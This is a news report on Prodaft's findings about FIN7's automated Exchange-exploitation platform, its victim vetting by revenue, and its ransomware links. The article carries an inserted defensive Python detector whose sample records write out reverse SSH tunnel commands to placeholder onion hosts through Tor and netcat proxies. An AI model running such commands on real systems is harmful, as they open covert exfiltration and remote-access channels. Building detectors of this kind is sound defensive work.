The notorious FIN7 hacking group uses an automated attack system that exploits Microsoft Exchange and SQL injection vulnerabilities to hack into corporate networks, steal data, and select targets for ransomware attacks based on financial size.
The threat intelligence team at Prodaft has been following the operations of FIN7 for years.
In a report shared with BleepingComputer before publication, Prodaft reveals details about FIN7’s internal hierarchy, affiliations with various ransomware projects, and a new backdoor system used for stealing files from compromised networks.
Russian-speaking threat actor FIN7 has been active since at least 2012.
They’ve been associated with attacks against ATMs, hiding malicious software in teddy bears, and setting up fake cybersecurity firms.
Auto-attacking Microsoft Exchange
The 'Checkmarks' auto-attack system discovered by Prodaft scans for multiple Microsoft Exchange remote code execution and privilege elevation vulnerabilities.
Checkmarks was used by FIN7 to discover vulnerable endpoints inside companies' networks and exploit them to gain access.
FIN7 gained access to the target networks through various exploits, including their own custom code and publicly available PoCs.
The Checkmarks attack platform targets several classes of vulnerabilities, the MS Exchange flaws being one of them.
After the initial attack stage, Checkmarks performs post-exploitation steps such as extracting email addresses from Active Directory and gathering information about the Exchange server.
New victims are added to a central panel where operators can see more details about the compromised endpoint.
Next, FIN7's internal 'marketing' team scrutinizes new entries and adds comments on the Checkmarks platform listing the victim's current revenue, number of employees, domain, headquarters details, and other information that can be used to determine whether the firm is worth the time and effort.
According to the Prodaft report shared with BleepingComputer, if a firm is deemed to have a sufficient market size, the pentester leaves a comment for the admin on how the server connection can be used, how long the attack can last, and how far it can go.
The due diligence that goes into evaluating a firm's size and financial status is notable, with FIN7's marketing team collecting information from diverse sources, including Owler.
According to Prodaft, FIN7’s Checkmarks platform has already been used to penetrate 8,147 companies, most of them based in the United States.
Ransomware and SSH backdoors
The Black Basta gang was connected to the FIN7 group in November of 2022, while Mandiant linked the Russian hackers to Darkside operations in April of the same year.
Further evidence of the DarkSide connection was discovered by Prodaft after they found what appeared to be ransom notes and files from the ransomware operation.
The retrieved logs also showed communications involving Darkside, REvil, and LockBit.
According to the logs, FIN7 likes to have a back door on extorted victims’ networks even after they have paid the ransom, either to sell access to other groups or to try a new attack themselves in the future.
A recent addition to FIN7’s arsenal allows them to steal files from breached devices using reverse SSH connections through an onion domain.
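The reverse SSH backdoor described above is a file-exfiltration channel, so a defender's first question is how to spot it from endpoint telemetry. The following is an added example, not code from the Prodaft report or from FIN7's tooling: a small heuristic that runs over constructed process-creation records and flags ssh invocations that open a reverse tunnel (`-R`) toward a `.onion` host or through a Tor/SOCKS wrapper. The record format, the sample hostnames and the onion addresses are all constructed for the example; the indicator list is an assumption about how such a tunnel would look on a command line, not something the report states.

```python
import os
import re
import shlex

# Constructed process-creation records (hostnames, users and onion names are placeholders).
SAMPLE_EVENTS = [
    {"host": "ws-01", "user": "svc_backup",
     "cmd": "ssh -R 2222:localhost:22 user@abcdefghijklmnop.onion "
            "-o ProxyCommand='nc -x 127.0.0.1:9050 %h %p'"},
    {"host": "ws-02", "user": "jdoe",
     "cmd": "ssh -L 8080:intranet:80 jdoe@bastion.corp.example"},
    {"host": "ws-03", "user": "svc_app",
     "cmd": "torsocks ssh -N -R 0.0.0.0:4444:127.0.0.1:22 ops@qrstuvwxyz234567.onion"},
    {"host": "ws-04", "user": "admin",
     "cmd": "ssh -R 9000:localhost:9000 admin@jump.corp.example"},
    {"host": "ws-05", "user": "root",
     "cmd": "scp report.pdf user@fileserver.corp.example:/tmp/"},
]

# v2 onion names are 16 chars, v3 are 56 chars, both base32 (a-z, 2-7).
ONION_RE = re.compile(r"\b[a-z2-7]{16,56}\.onion\b")
# Assumed indicators of Tor/SOCKS wrapping on the command line.
TOR_HINTS = ("torsocks", "proxychains", "127.0.0.1:9050", "127.0.0.1:9150", "proxycommand")


def _ssh_index(tokens):
    """Return the index of the ssh binary in the token list, or -1 if absent."""
    for i, tok in enumerate(tokens):
        if os.path.basename(tok) == "ssh":
            return i
    return -1


def _has_reverse_flag(tokens):
    """True if any short-option cluster carries -R (ssh allows bundling such as -NR)."""
    return any(t.startswith("-") and not t.startswith("--") and "R" in t[1:] for t in tokens)


def classify(cmd):
    """Return a verdict dict for a reverse-tunnel ssh command line, else None."""
    try:
        tokens = shlex.split(cmd)
    except ValueError:  # unbalanced quotes: not parseable as a shell command
        return None
    idx = _ssh_index(tokens)
    if idx < 0:
        return None
    if not _has_reverse_flag(tokens[idx + 1:]):
        return None
    reasons = ["reverse tunnel (-R)"]
    lowered = cmd.lower()
    if ONION_RE.search(lowered):
        reasons.append("onion destination")
    if any(hint in lowered for hint in TOR_HINTS):
        reasons.append("tor/proxy wrapper")
    # A reverse tunnel alone is worth a look; combined with Tor it is high priority.
    severity = "high" if len(reasons) > 1 else "medium"
    return {"severity": severity, "reasons": reasons}


def analyze(events):
    """Run the heuristic over a list of records and return the findings in input order."""
    findings = []
    for ev in events:
        verdict = classify(ev["cmd"])
        if verdict:
            findings.append({"host": ev["host"], "user": ev["user"], **verdict})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"{f['severity']:6} {f['host']:6} {f['user']:12} {', '.join(f['reasons'])}")
```

Run against the sample records, the two onion-bound reverse tunnels come out as high severity and the internal reverse tunnel on ws-04 as medium; the forward tunnel and the scp transfer are ignored. The medium tier exists because `-R` toward an internal jump host is common administrative behaviour, and `ProxyCommand` alone is likewise used for legitimate bastions, so only the combination with an onion destination or a Tor wrapper should page anyone.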
The Checkmarks platform shows how threat actors are industrializing public exploits to perform large-scale attacks with a global impact.
According to the investigation, FIN7 targets everyone and evaluates how valuable they are in a second phase.
Prodaft has provided indicators of compromise for the SSH-based backdoor in their report. Admins should review the report to learn how to protect their networks.